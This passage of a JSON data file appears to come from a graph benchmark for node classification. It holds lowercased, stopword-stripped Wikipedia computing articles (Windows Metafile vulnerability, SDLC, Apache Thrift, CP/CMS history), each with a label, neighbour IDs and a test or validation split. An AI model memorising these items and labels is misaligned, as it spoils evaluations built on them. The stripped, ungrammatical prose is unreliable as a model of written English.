    "text": "Ari_Schwartz:ari schwartz ari m. schwartz former senior director cybersecurity united states national security council staff white house left role october 2015 previously director cybersecurity privacy civil liberties policy schwartz came white house serving senior advisor technology policy united states secretary commerce previously national institute standards technology served internet policy advisor working internet policy task force department commerce government service schwartz vice president chief operating officer center democracy technology cdt washington d.c. united states formerly cdt senior policy analyst subsequently center vice president coo cdt schwartz rsa conference award excellence public policy online trust alliance award excellence public policy october 2015 revealed schwartz stepped role senior director cybersecurity two-year tenure remarked always planned leave role period schwartz praised departure helping develop government cybersecurity framework voluntary guideline help companies bolster security programs honest broker industry civil society schwartz detroit michigan area holds bachelor degree sociology brandeis university",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 6543,
    "label": 2,
    "text": "Unique_set_size:unique set size computing unique set size uss portion main memory ram occupied process guaranteed private process unshared memory process reported uss concept used software running linux operating system proposed matt mackall complications arose trying count real memory used process concepts resident set size virtual memory size vmsize n't helping developers tried know much memory programs using",
    "neighbors": [
      6616,
      1025,
      11539,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 6544,
    "label": 5,
    "text": "Synchronous_Data_Link_Control:synchronous data link control synchronous data link control sdlc computer communications protocol layer 2 protocol ibm systems network architecture sna sdlc supports multipoint links well error correction also runs assumption sna header present sdlc header sdlc mainly used ibm mainframe midrange systems however implementations exist many platforms many vendors use sdlc sna becoming rare mostly replaced ip-based protocols tunneled ip using anynet technologies united states sdlc found traffic control cabinets 1975 ibm developed first bit-oriented protocol sdlc work done ibm early 1970s de facto standard adopted iso high-level data link control hdlc 1979 ansi advanced data communication control procedures adccp latter standards added features asynchronous balanced mode frame sizes need multiples bit-octets also removed procedures messages test message sdlc operates independently communications link operate point-to-point multipoint loop facilities switched dedicated two-wire four-wire circuits full-duplex half-duplex operation unique characteristic sdlc ability mix half-duplex secondary stations full-duplex primary stations four-wire circuits thus reducing cost dedicated facilities intel used sdlc base protocol bitbus still popular europe fieldbus included support several controllers i8044/i8344 i80152 8044 controller still production third party vendors vendors putting hardware support sdlc slightly different hdlc communication controller chips 1980s included zilog motorola national semiconductor result wide variety equipment 1980s used common mainframe centric corporate networks norm 1980s common alternatives sna sdlc probably decnet digital data communications message protocol ddcmp burroughs network architecture bna burroughs data link control bdlc arpanet imps hdlc mostly extension sdlc features deleted renamed features present hdlc sdlc also sdlc later hdlc extensions iso/iec 13239 hdlc renamed sdlc frames hdlc names incorporated later versions sdlc features added hdlc subsequently added back later versions sdlc two u frames sdlc exist hdlc several u frames almost entirely unused hdlc existing primarily sdlc compatibility test u frame included early hdlc standards added later special mode sdlc operation supported e.g zilog scc incorporated hdlc sdlc loop mode mode primary number secondaries connected unidirectional ring network one transmit output connected next receive input secondary responsible copying frames arrive input reach rest ring eventually return primary except copying secondary operates half-duplex mode transmits protocol guarantees receive input secondary powered relay connects input directly output powering secondary waits opportune moment goes on-loop inserting data stream one-bit delay similar opportunity used go off-loop part clean shutdown sdlc loop mode frames arrive group ending final flag all-ones idle signal first seven 1-bits pattern 01111111 constitutes go-ahead sequence also called eop end poll giving secondary permission transmit secondary wishes transmit uses 1-bit delay convert final 1 bit sequence 0 bit making flag character transmits frames final flag transmits all-ones idle signal serve go-ahead next station loop group starts commands primary secondary appends responses primary receives go-ahead idle sequence knows secondaries finished may transmit commands beacon bcn response designed help locate breaks loop secondary see incoming traffic long time begins sending beacon response frames telling primary link secondary predecessor broken primary also receives copy commands sent indistinguishable responses appends special turnaround frame end commands separate responses unique sequence interpreted secondaries conventional one single all-zero byte runt frame address 0 reserved unused control field frame check sequence secondaries capable full-duplex operation also interpret shut-off sequence forcing abort transmission",
    "neighbors": [
      9860,
      3847,
      1297,
      5021,
      2206,
      10280,
      10548,
      7865,
      2746,
      4667,
      4543,
      7360,
      4546,
      11332,
      1997,
      1893,
      4586,
      5875,
      3323,
      5118,
      2431
    ],
    "mask": "Test"
  },
  {
    "node_id": 6545,
    "label": 6,
    "text": "File_change_log:file change log file change log tracks changes namespace files directories file system depending implementation file change log record changes creates links unlinks deletions renamed files data changes metadata changes example acls permissions file change log accessed file file system hidden accessed programmatically file change log differs file system journal log serve least two purposes first applications must scan entire file system discover changes since last scan reading file change log avoid scan scanning applications include backup utilities web crawler search engines replication programs second log serve audit record activity file system",
    "neighbors": [
      5120,
      6669,
      3598,
      10257,
      6677,
      5142,
      8214,
      9762,
      5158,
      11323,
      8772,
      4708,
      9836,
      7789,
      113,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      7344,
      2230,
      5816,
      1212,
      8380,
      10951,
      9420,
      3795,
      4819,
      8404,
      728,
      8410,
      6365,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      9004,
      302,
      6961,
      9025,
      3909,
      2378,
      4431,
      346,
      2395,
      2397,
      10596,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      11675,
      414,
      2974,
      7070,
      4012,
      1454,
      6062,
      8114,
      7603,
      1464,
      1978,
      8643,
      7126,
      1509,
      9189,
      11256,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 6546,
    "label": 3,
    "text": "Nuts_&_Milk:nuts amp milk versions nuts milk involve player moving various levels collecting assortment fruit scattered throughout one gathering fruit particular screen player gain access previously unopened house door containing milk fiancée yogurt player makes contact female blob advanced next level start process anew movement levels accomplished using directional pad keyboard move milk across stage avoiding pitfalls obstacles notably character rival nuts contact made time game play nuts harmful objects miniature blimps player lose life restart current level fruit reset back initial positions three milk lives lost fashion game ends famicom version milk jump short distance vertically horizontally allowing transverse pits quickly gain access adjacent platform player falls great distance milk become momentarily dazed unable move player joggles awake jump button rope bridges suspended mid-air levels using directional pad player climb well walk across reach top 50 individual levels exist famicom version one skipped freely pressing select button player cycled fifty return first level restart sequence milk lives lost famicom msx version also contain level editor mode player freely edit first stage game placing objects enemies screen milk interact stage takes place first level normal game play console reset set fantasy world nuts milk follows story pink male blob named milk must find fiancée yogurt similar pink blob red hair bow rescue nuts teal blob also vies affection journey take milk several levels process finding saving love repeat several times nuts mounts ever-present resistance quest romance originally developed japanese software company hudson soft several home computers japan nuts milk became company first famicom video game game borrows elements lode runner earlier hudson project arcade-styled platformers donkey kong even emulates title screen nintendo early 1980s releases game retains stylistic similarities games published time unique arcade-styled game never released actual arcade system two different versions game created one home computers one famicom nuts milk released home computers nintendo famicom roughly time although versions similar overall goal differences presentation famicom version played sideways angle typical 2d sidescrollers player walking jumping one area another horizontally conversely computer version presented top-down fashion platforming elements removed player instead moving four directions version also contains slight degradation sound graphics due comparatively less powerful hardware personal computers time additionally famicom version makes use standard famicom 2-button controller computer releases instead rely keyboard 1985 melbourne house ported famicom version commodore 64 name hot pop version nuts milk resembling famicom release since ported mobile phones download service beginning september 1 2003 japan kg telecom part gamemaster compilation contains hudson soft games 8-bit era service later extended parts world january 2004 tf1 i-games nuts milk extremely commonly found unauthorized famiclone systems well bootleg multicarts december 22 2005 hudson released nuts milk along classic puzzle games game boy advance hudson collection vol 4 nazotoki collection exclusively japan music versions nuts milk composed internally hudson soft made entirely synth-based chiptunes common audio medium early video games though exclusive soundtrack either game never released music versions found 1987 compilation album hudson game music catalog number 28xa-87 released japan alfa gmo records",
    "neighbors": [
      10644,
      6109,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 6547,
    "label": 3,
    "text": "Loco-Motion_(video_game):loco-motion video game loco-motion also known guttang gottong arcade puzzle game developed konami 1982 licensed centuri loco-motion player builds path unstoppable locomotive moving tracks allow pick passengers loco-motion basically updated version sliding block puzzle game player move tiles horizontally vertically within rectangular frame contains one empty square tiles sections railroad track player must use construct path locomotive never stops moving laid around edges frame several stations passengers must picked player uses joystick slide piece track vacant square use button accelerate locomotive however always motion stopped player must avoid running dead-end barricade barrier playfield edge edge empty square costs one life player moves pieces track around route locomotive take highlighted yellow dead end countdown timer occasionally appears station passengers waiting player picks countdown reaches zero remaining amount added score bonus points passengers send crazy train onto tracks player must avoid crashing countdown timer unoccupied station reaches zero station destroyed becomes pair barrier squares crazy trains crashed destroy creates new pair dead ends destroys station collision happens within higher levels special pieces track one entrance three different exits player choose exit locomotive takes picked randomly bonus points awarded time locomotive crosses one pieces track level cleared passengers pick player moves onto next level different layout bigger smaller dead ends also bonus stations appear frequently later levels one crazy trains screen outset player creates closed loop track rides several seconds loop sweeper appears moves around loop behind sweeper reaches locomotive player loses life sweepers crashed crazy trains destroy consequences extra life awarded 10,000 points bonus station points randomly determined beginning high 2,470 points locomotion ported intellivision tomy tutor meanwhile activision working game called happy trails strikingly similar gameplay happy trails released prior locomotion saw great reviews forcing intellivision release locomotion reduced price msx saw port konami name crazy train m-network also made prototype atari 2600 video game system however july 5 1983 release game cancelled unknown reasons confuzion 1985 zx spectrum commodore 64 similar design loco-motion game boy game boy color saw release game japan uk one four games part four volume set games called konami gb collection japan game released game boy super game boy features yet uk colorized translated english game boy color",
    "neighbors": [
      1776,
      3788,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 6548,
    "label": 4,
    "text": "Service_scan:service scan computer networks service scan identifies services running list open ports closely tied port scanning tools e.g nmap nessus support service scan preferable referring port list identify services running non-standard ports common practice service scanners work sending probe data port monitoring response example sending get probe could detect web server exact response give indication server multiple probes sent identify less common services nmap service scan captures information unidentified ports users encouraged submit details included updates almost vulnerability scanners built-in service scan results service scan used determine tests run port",
    "neighbors": [
      2084,
      1200,
      6993,
      2739,
      4373,
      7031
    ],
    "mask": "Test"
  },
  {
    "node_id": 6549,
    "label": 3,
    "text": "Frequency_scaling:frequency scaling computer architecture frequency scaling also known frequency ramping technique increasing processor frequency enhance performance system containing processor question frequency ramping dominant force commodity processor performance increases mid-1980s roughly end 2004 effect processor frequency computer speed seen looking equation computer program runtime instructions per program total instructions executed given program cycles per instruction program-dependent architecture-dependent average value time per cycle definition inverse processor frequency increase frequency thus decreases runtime however power consumption chip given equation p power consumption c capacitance switched per clock cycle v voltage f processor frequency cycles per second increases frequency thus increase amount power used processor increasing processor power consumption led ultimately intel may 2004 cancellation tejas jayhawk processors generally cited end frequency scaling dominant computer architecture paradigm moore law still effect frequency scaling ended despite power issues transistor densities still doubling every 18 24 months end frequency scaling new transistors longer needed facilitate frequency scaling used add extra hardware additional cores facilitate parallel computing technique referred parallel scaling end frequency scaling dominant cause processor performance gains caused industry-wide shift parallel computing form multicore processors",
    "neighbors": [
      10675,
      9932,
      10966,
      4334
    ],
    "mask": "Test"
  },
  {
    "node_id": 6550,
    "label": 4,
    "text": "Windows_Metafile_vulnerability:windows metafile vulnerability windows metafile vulnerability—also called metafile image code execution abbreviated mice—is security vulnerability way versions microsoft windows operating system handled images windows metafile format permits arbitrary code executed affected computers without permission users discovered december 27 2005 first reports affected computers announced within 24 hours microsoft released high-priority update eliminate vulnerability via windows update january 5 2006 attacks using vulnerability known wmf exploits vulnerability located gdi32.dll existed versions microsoft windows windows 3.0 windows server 2003 r2 however attack vectors exist nt-based versions windows windows nt windows 2000 windows xp windows server 2003 exploits taking advantage vulnerability windows nt-based systems facilitated propagation various types malware typically drive-by downloads due extreme impact bug 2007 pwnie award mass 0wnage breaking internet versions microsoft windows operating system support windows metafile graphics standard versions windows 3.0 windows server 2003 r2 contain security flaw however windows nt 4.0 windows xp unless patched vulnerable earlier versions default installation enables windows metafile code execution source vulnerability later versions windows vulnerability according computer security expert steve gibson windows nt 4 vulnerable known exploits image preview enabled windows operating systems image preview enabled hardware-based data execution prevention dep active applications susceptible exploit operating systems windows e.g. macos unix linux etc directly affected however non-windows system could become vulnerable runs software view windows wmf files could include software incorporates clones windows native graphics device interface gdi dynamic-link library dll run windows windows programs emulator compatibility layer unix-like system uses wine emulate windows example could exploited gibson wrote program mousetrap company distributes freeware detect windows metafile vulnerability systems running windows windows emulators according assessments f-secure vulnerability inherent defect design wmf files underlying architecture files previous era includes features allow actual code executed whenever wmf file opens original purpose mainly handle cancellation print jobs spooling according secunia vulnerability caused due error handling windows metafile files '.wmf containing specially crafted codice_1 'escape records records allow arbitrary user-defined function executed rendering wmf file fails according windows 3.1 sdk documentation codice_1 escape obsoleted replaced function name windows 3.1 long wmf vulnerability discovered however obsoleted escape code retained compatibility 16 bit programs written least backwards compatible windows 3.0 change happened approximately time microsoft creating 32 bit reimplementation gdi windows nt likely vulnerability occurred effort 'escape mechanism question allows applications metafiles access output device features yet abstracted gdi hardware accelerated bézier curves encapsulated postscript support etc done passing opcode size pointer data call usually pass driver escape calls produce actual graphics general escape mechanism allowed metafiles little thought originally given possibility using things like setabortproc modern non-vulnerable metafile interpreters checks opcode blacklist whitelist keeping full set opcodes available regular code calls gdi escape functions directly code already running way code could make gdi call security risk case worth noting 16 bit windows except rarely used real mode windows 3.0 immune vulnerability pointer specified metafile point data within metafile 16 bit windows always full no-execute-data enforcement mandated segmented architecture 16 bit protected mode windows nt cpu architectures 32 bit x86 mips powerpc alpha itanium x86_64 required return-oriented programming exploit architectures no-execute functionality missing older x86 processors vulnerability cve-2005-4560 common vulnerabilities exposures database us-cert reference vu 181038 microsoft knowledge base article 912840 first observed wild researchers sunbelt software december 28 2005 announced publicly company president alex eckelberry computers affected via spread infected e-mails carry hacked wmf file attachment infection may also result methods may also used propagate infection problem within operating system using non-microsoft browsers firefox opera provide complete protection users typically prompted download view malicious file infecting computer infected files may downloaded automatically opens possibility infection disk indexing accidental previewing according assessments mcafee antivirus company vulnerability used propagate bifrost backdoor trojan horse forms malware also exploited vulnerability deliver various malicious payloads mcafee claims first generation exploits encountered 6 customer base 31 december 2005 microsoft released official patch address problem 5 january 2006 patch may applied lieu corrective measures official patch available windows 2000 windows xp microsoft windows server 2003 windows nt 4 older operating systems receive patch longer supported microsoft steve gibson stated security podcast 20 company gibson research corporation would make patch available windows 9x systems microsoft research steve gibson stated later security podcast 23 windows 9x vulnerable need patching windows 9x/me users run mouse trap utility see free downloadable patch windows nt provided paolo monti future time italian distributor eset nod32 anti-virus system patch works older operating systems supplied without warranty reports official patch automatically installed even windows automatic update configured ask installing automatically downloaded updates causes automatic reboot cause loss data user program open unsaved changes measures historical interest systems updated 5 january 2006 workaround patch available 28 december 2005 microsoft advised windows users unregister dynamic-link library file shimgvw.dll done executing command codice_3 run menu command prompt invokes previewing image files exploited attacks dll re-registered patching running codice_4 workaround blocks common attack vector eliminate vulnerability third party patch released ilfak guilfanov 31 december 2005 temporarily disable vulnerable function call gdi32.dll unofficial patch received much publicity due unavailability official one microsoft receiving recommendation sans institute internet storm center f-secure large amount publicity including indirectly slashdotted guilfanov website received visitors could cope suspended 3 january 2006 patch still available download number mirrors including internet storm center website guilfanov website went back online 4 january much-reduced state longer providing patch on-site due bandwidth issues homepage provided list mirrors user could download patch associated vulnerability-checker md5 checksum file could checked downloaded file probably genuine microsoft released patch guilfanov withdrew microsoft says patch removes flawed functionality gdi32 allowed wmf vulnerability computers running unpatched version windows defence depth approach recommended mitigate risk infection various sources recommended mitigation efforts include according sans institute internet storm center article using web browser internet explorer may offer additional protection vulnerability depending settings browsers may ask user opening image .wmf extension reduces chance opening maliciously crafted windows metafile protect vulnerability exploited browsers still open metafile masquerading another format better entirely disable image loading browser used 2006 steve gibson suggested peculiar nature 'bug indication vulnerability actually backdoor intentionally engineered system accusation became assertion spread internet rumor technology news website slashdot picked gibson speculation rumor widely debunked thomas greene writing register attributed gibson mistake lack security experience called popinjay expert",
    "neighbors": [
      5891,
      5636,
      10756,
      8455,
      8584,
      6797,
      8976,
      1429,
      2709,
      5397,
      161,
      2213,
      552,
      11051,
      7855,
      7983,
      3250,
      5682,
      823,
      704,
      9537,
      10437,
      3916,
      1103,
      5078,
      7515,
      1632,
      3555,
      4836,
      4074,
      107,
      9325,
      4081,
      4467,
      5492,
      2811
    ],
    "mask": "Test"
  },
  {
    "node_id": 6551,
    "label": 2,
    "text": "ILIOS:ilios ilios acronym interlink internet operating system attempt create router-only operating system one specifically oriented towards computer networking purposes especially routing supports ipv4 routing good educational os though single tasking everything via interrupts released bsd license author research os rink springer also responsible porting freebsd xbox",
    "neighbors": [
      2179,
      5469,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 6552,
    "label": 9,
    "text": "BEFLIX:beflix beflix name first embedded domain-specific language computer animation invented ken knowlton bell labs 1963 name derives combination bell flicks ken knowlton used beflix create animated films educational engineering purposes also collaborated artist stan vanderbeek bell labs create series computer-animated films called poemfields 1966 1969 beflix developed ibm 7090 mainframe computer using stromberg-carlson sc2040 microfilm recorder output programming environment targeted beflix consisted fortran ii implementation fortran ii assembly program fap macros first version beflix implemented fap macro facility later version targeting fortran iv resembled traditional subroutine library lost unique flavor language pixels produced writing characters screen microfilm recorder defocused electron beam sc2040 used charactron tube expose microfilm beflix electron beam defocused draw pixels blurred character shapes characters selected create range grayscale values pixels microfilm recorder connected directly 7090 communicates magnetic tape beflix writes magnetic tape output 7090 film recorder reads tape create film output beflix also supports preview mode selected frames output written line printer memory 7090 organized rectangular surfaces pixels surfaces designated two letter code identifies particular surface geometry beflix supports two resolutions output frames fine 252x184 coarse 126x92 7090 enough memory support two fine resolution frames surface organization beflix allows different geometric combinations smaller surfaces within available memory beflix pixels store values 0-7 allowing packed 12 36-bit word 7090 beflix provides low-level operations high-level operations low-level operations beflix provides 26 scanners named z scanner value coordinate position surface low-level statements beflix apply operations scanner based set conditions met example low-level operation codice_1 says following conditions true following operations performed control passed statement label codice_2 way complicated patterns programmed behavior scanners film output proceeds scanner operations immediate operations update surfaces without frame output operations high-level operations beflix fall roughly four categories drawing primitives dynamic rectangle operations performed incrementally series output frames quick way encode animations",
    "neighbors": [
      3960,
      9926
    ],
    "mask": "None"
  },
  {
    "node_id": 6553,
    "label": 9,
    "text": "Scene_description_language:scene description language scene description language description language used describe scene rendered 3d renderer ray tracer scene written text editor may include syntax highlighting opposed modeled graphical way scene description language may include variables constants conditional statements loops loops 3dmlw x3d xml-based scene description languages tao presentations application uses xl dynamic document description language pov-ray 3dmlw x3d tao presentations",
    "neighbors": [
      9192,
      10465,
      10142,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 6554,
    "label": 2,
    "text": "Joanna_Hoffman:joanna hoffman joanna karine hoffman born july 27 1953 american marketing executive one original members apple computer macintosh team next team hoffman born poland daughter film director jerzy hoffman armenian former wife marlena nazarian lived mother armenian ssr age 10 went live father warsaw poland around age 12 1967 mother married american moved buffalo new york hoffman joined united states 1968 hoffman quickly became fluent english excelled school background anthropology physics linguistics bachelor science humanities science mit pursued doctorate complete archaeology university chicago oriental institute 1979 scheduled travel iran archaeology dig stopped poland visit grandmother received word iran would return united states iranian revolution hoffman leave absence university chicago encouraged friends attend lecture xerox parc california heated discussion lecture jef raskin discussion focused computers look like improve people lives raskin impressed hoffman asked interview position apple began macintosh project october 1980 part raskin initial team burrell smith bud tribble brian howard time began mac still research project position constituted entire macintosh marketing team first year half project also wrote first draft macintosh user interface guidelines hoffman would eventually run international marketing team brought mac europe asia later followed steve jobs next one original members hoffman reputation apple next one could successfully engage jobs 1981 1982 satirical award apple given person best job standing jobs ” jobs aware award liked early 1990s hoffman vice president marketing general magic retiring 1995 spend time family occasion given public lectures discussing early life apple working steve jobs hoffman married alain rossmann native france also worked apple two sons children attended international school peninsula palo alto served school board abigail mcconnell portrayed hoffman 2013 film jobs british actress kate winslet portrayed hoffman 2015 film steve jobs winslet golden globe award best supporting actress – motion picture bafta award best actress supporting role nominated academy award best supporting actress performance nature relationship hoffman jobs winslet described jobs work wife extraordinary feisty eastern european person pretty much person could actually knock sense steve",
    "neighbors": [
      9123,
      10406,
      2282,
      7307,
      7806,
      1389,
      11118,
      9999,
      11420,
      9778,
      10386,
      3412,
      7640,
      6234,
      4251,
      8540,
      350,
      511
    ],
    "mask": "None"
  },
  {
    "node_id": 6555,
    "label": 5,
    "text": "Apache_Thrift:apache thrift thrift interface definition language binary communication protocol used defining creating services numerous languages forms remote procedure call rpc framework developed facebook scalable cross-language services development combines software stack code generation engine build cross-platform services connect applications written variety languages frameworks including actionscript c c++ c cappuccino cocoa delphi erlang go haskell java node.js objective-c ocaml perl php python ruby rust smalltalk swift although developed facebook open source project apache software foundation implementation described april 2007 technical paper released facebook hosted apache thrift includes complete stack creating clients servers top part generated code thrift definition file services generate client processor code contrast built-in types created data structures sent result generated code protocol transport layer part runtime library thrift possible define service change protocol transport without recompiling code besides client part thrift includes server infrastructure tie protocols transports together like blocking non-blocking multi-threaded servers underlying i/o part stack implemented differently different languages thrift supports number protocols supported transports thrift also provides number servers stated benefits thrift include thrift written c++ create code number languages create thrift service one write thrift files describe generate code destination language write code start server call client code example description file thrift generate code descriptive information instance java codice_2 simple codice_3 inside codice_4 class",
    "neighbors": [
      4107,
      6161,
      1047,
      8217,
      9245,
      5154,
      6694,
      11303,
      5165,
      5677,
      1586,
      9789,
      7742,
      7233,
      11332,
      7750,
      2130,
      11355,
      7261,
      8799,
      8294,
      8810,
      8303,
      2163,
      6774,
      7292,
      10377,
      8860,
      2222,
      1203,
      7359,
      6338,
      1222,
      4294,
      9926,
      7889,
      8408,
      6875,
      9441,
      10465,
      10470,
      8425,
      747,
      9454,
      10486,
      11017,
      8460,
      1296,
      3876,
      3877,
      9518,
      1327,
      4919,
      1851,
      7485,
      4419,
      4944,
      1363,
      6487,
      865,
      11111,
      8554,
      10097,
      1913,
      6523,
      3462,
      8582,
      7567,
      11161,
      1435,
      5029,
      10661,
      5047,
      4538,
      6074,
      8644,
      1991,
      5066,
      8139,
      9179,
      990,
      479,
      10719,
      11235,
      7147,
      5612,
      4589,
      8691,
      7159,
      1018,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 6556,
    "label": 9,
    "text": "MSWLogo:mswlogo mswlogo programming language interpreted based language logo graphical user interface gui front end developed george mills massachusetts institute technology mit core ucblogo brian harvey free open-source software source code available borland c++ mswlogo supports multiple turtle graphics 3d computer graphics allows input ports com lpt also supports windows interface input/output i/o available gui keyboard mouse events trigger interrupts simple gif animations may also produced mswlogo version 6.5 command codice_1 program also used educational software jim muller wrote great logo adventure complete logo manual using mswlogo demonstration language mswlogo evolved fmslogo educational programming environment free open source implementation language logo microsoft windows released gnu general public license gpl mainly developed maintained david costanzo mswlogo version 6.5b supports many functions including",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      8262,
      75,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      5751,
      7805,
      1159,
      9865,
      6797,
      9877,
      5803,
      2225,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      4846,
      5360,
      5361,
      9969,
      8435,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      780,
      5395,
      1301,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      311,
      6969,
      3408,
      6994,
      1365,
      2392,
      10083,
      6502,
      11625,
      3446,
      10104,
      377,
      4992,
      7562,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      4550,
      11218,
      10712,
      3034,
      3051,
      5611,
      7670,
      11255
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6557,
    "label": 2,
    "text": "History_of_CP/CMS:history cp/cms article covers history cp/cms — historical context ibm time-sharing virtual machine operating system built cp/cms development occurred complex political technical milieu historical notes provides supporting quotes citations first-hand observers seminal first-generation time-sharing system ctss first demonstrated mit 1961 production use 1964–74 paved way multics cp/cms time-sharing environments time-sharing concepts first articulated late 50s particularly way meet needs scientific computing time computers primarily used batch processing — jobs submitted punch cards run sequence time-sharing let users interact directly computer calculation simulation results could seen immediately scientific users quickly embraced concept time-sharing pressured computer vendors ibm improved time-sharing capabilities mit researchers spearheaded effort launching project mac intended develop next generation time-sharing technology would ultimately build multics extremely feature-rich time-sharing system would later inspire initial development unix high-profile team leading computer scientists formed specific technical recommendations requirements seeking appropriate hardware platform new system technical problems awesome early time-sharing systems sidestepped problems giving users new modified languages dartmouth basic accessed interpreters restricted execution contexts project mac vision shared unrestricted access general-purpose computing along vendors ibm submitted proposal project mac however ibm proposal well received ibm surprise mit chose ge multics system vendor fallout event led directly cp/cms early 60s ibm struggling define technical direction company identified problem past computer offerings incompatibility many ibm products product lines new product family new generation technology forced customers wrestle entirely new set technical specifications ibm products incorporated wide variety processor designs memory architectures instruction sets input/output strategies etc course unique ibm computer vendors seemed begin new system clean sheet design ibm saw problem opportunity cost software migration increasing barrier hardware sales customers could afford upgrade computers ibm wanted change ibm embarked risky undertaking system/360 product line intended replace ibm diverse earlier offerings including ibm 7000 series canceled ibm 8000 series ibm 1130 series various specialized machines used scientific applications system/360 would span unprecedented range processing power memory size device support cost important based pledge backward compatibility customer could move software new system without modification today world standard interfaces portable systems may seem radical goal time revolutionary system/360 computer model often specific devices programs could used systems buying bigger cpu also meant buying new printers card readers tape drives etc addition customers would rewrite programs run new cpu something customers often balked s/360 ibm wanted offer huge range computer systems sharing single processor architecture instruction set i/o interface operating system customers would able mix match meet current needs could confidently upgrade systems future without need rewrite software applications ibm focus remained traditional customer base large organizations administrative business data processing start system/360 project ibm fully appreciate amount risk involved system/360 ultimately gave ibm total dominance computer industry first nearly put ibm business ibm took one largest ambitious engineering projects history process discovered diseconomies scale mythical man-month extensive literature period fred brooks illustrate pitfalls period system/360 panic project mac asked ibm provide computers extensive time-sharing capabilities direction system/360 project going time-sharing n't seen important ibm main customer base batch processing key moreover time-sharing new ground many concepts involved virtual memory remained unproven example time nobody could explain troubled manchester/ferranti atlas virtual memory n't work later explained due thrashing based cp/cms m44/44x research result ibm system/360 announcement april 1964 include key elements sought time-sharing advocates particularly virtual memory capabilities project mac researchers crushed angered decision system/360 design team met project mac researchers listened objections ibm chose another path february 1964 height events ibm launched cambridge scientific center csc headed norm rassmussen csc serve link mit researchers ibm labs located building project mac ibm fully expected win project mac competition retain perceived lead scientific computing time-sharing one csc first projects submit ibm project mac proposal ibm received intelligence mit leaning toward ge proposal modified 600-series computer virtual memory hardware enhancements would eventually become ge 645 ibm proposed modified s/360 would include virtual memory device called blaauw box – component designed included s/360 mit team rejected ibm proposal modified s/360 seen different rest s/360 line mit want use customized special-purpose computer multics sought hardware would widely available ge prepared make large commitment time-sharing ibm seen obstructive bell laboratories another important ibm customer soon made decision rejected s/360 time-sharing loss project mac devastating csc essentially lost reason existence rasmussen remained committed time-sharing wanted earn back confidence mit researchers made bold decision now-idle csc team would build time-sharing operating system s/360 robert creasy left project mac lead csc team promptly began work become cp-40 first successful virtual machine operating system based fully virtualized hardware ibm loss project mac bell laboratories caused repercussions elsewhere ibm csc soon submitted successful proposal mit lincoln laboratory s/360-67 marking improvement ibm credibility mit committing real time-sharing product rather customized rpq system ibm showing kind commitment mit found ge csc also continued work cp-40 ostensibly provide research input s/360-67 team — also csc team grown skeptical tss project faced aggressive schedule lofty goals since s/360-67 would available csc time team conceived ingenious stopgap measure building virtual-memory s/360 designed set custom hardware microcode changes could implemented s/360-40 providing comparable platform capable supporting cp-40 virtual machine architecture actual cp-40 cms development began mid 1965 even arrival modified s/360-40 first production use cp-40 january 1967 tss project meantime running late struggling problems csc personnel became increasingly convinced cp/cms correct architecture s/360 time-sharing september 1966 csc staff began conversion cp-40 cms run s/360-67 cp-67 significant reimplementation cp-40 varian reports design generalized substantially allow variable number virtual machines larger virtual memories new data structures replaced control blocks describing virtual machines hard-coded part nucleus cp-67 added concept free storage control blocks could allocated dynamically inter-module linkage also reworked code made re-entrant since csc -67 would arrive time csc modified microcode customized s/360-40 simulate s/360-67 – particularly different approach virtual memory csc repeatedly successfully used simulation work around absence hardware waiting modified s/360-40 s/360-67 later first s/370 prototypes seen logical outgrowth virtual machine thinking period early testing cp-67 also done sites s/360-67 hardware available – notably ibm yorktown heights lab mit lincoln laboratory observers cp-67 lincoln labs already frustrated severe tss problems impressed cp-67 insisted ibm provide copy cp/cms according varian demand rocked whole company invested heavily tss however site critical ibm complied varian others speculate chain events could engineered rasmussen subterfuge motivate ibm continued funding csc work counter-strategic cp/cms told several times kill april 1967 – months cp-40 went production – cp/cms already daily use lincoln labs lincoln lab personnel worked closely csc improving cp/cms began enhancing cp cms soon delivered lincoln cambridge people worked together closely exchanged code regular basis beginning tradition code sharing mutual support would continue years around time union carbide another influential ibm customer followed path – deciding run cp/cms send personnel work csc contribute cp/cms development effort cp-40 cp-67 cms essentially research systems time built away ibm mainstream product organizations active involvement outside researchers experimenting important goal constant activity robert creasy cp-40 project leader later wrote design cp/cms small varied software research development group use support… experimenting time-sharing system design ... schedules budgets plans performance goals met.… also expected redo system least got going group meant learning experience efficiency specifically excluded software design goal although always considered know system would practical use ... january 1965 starting work system became apparent presentations outside groups system would controversial tss meantime described varian elegant ambitious system exhibiting serious stability performance problems snatched nest young february 1968 time share 30 eighteen s/360-67 sites attempting run tss conference ibm announced via blue letter tss decommitted — great blow time-sharing community decision would temporarily reversed tss would scrapped 1971 however cp/cms soon began gaining attention viable alternative time s/360-67 software bundled computer hardware purchases see ibm unbundling software services particular ibm operating systems available without additional charge ibm customers cp/cms unusual delivered unsupported type-iii software source code form – meaning cp/cms sites ran unsupported operating system need self-support community support helped lead creation strong s/360-67 cp/cms user communities precursors open source movement summer 1970 cp/cms team begun work system/370 version cp/cms would become vm/370 cp-370 proved vital s/370 project providing usable simulation s/370 s/360-67 hardware – reprise csc earlier hardware simulation strategies approach enabled s/370 development testing s/370 hardware available shortage 